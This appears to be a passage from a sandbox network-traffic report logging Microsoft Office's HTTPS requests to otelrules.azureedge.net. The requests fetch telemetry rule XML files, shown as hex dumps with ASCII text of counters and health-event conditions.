                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:18 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        2192.168.2.54971313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:19 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:19 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142519Z-16547b76f7f7rtshhC1DFWrtqn0000000ksg00000000dxee
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        3192.168.2.54971413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:19 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-16547b76f7fr28cchC1DFWnuws0000000kt000000000kc69
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        4192.168.2.54971113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 289c86fb-001e-0066-7f0d-36561e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-1749fc9bdbddwt7mhC1DFWssk800000000dg000000007ntv
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        5192.168.2.54971513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d96f0357-501e-00a0-7911-369d9f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-1749fc9bdbddwt7mhC1DFWssk800000000kg000000008ebg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        6192.168.2.54971213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 053649b2-001e-00ad-26a0-34554b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-r178fb8d765j7nnvhC1DFW39w400000001v00000000016m6
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        7192.168.2.54971613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:20 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: ee786005-101e-0065-140e-2d4088000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142520Z-16547b76f7f22sh5hC1DFWyb4w0000000kt0000000000ddu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
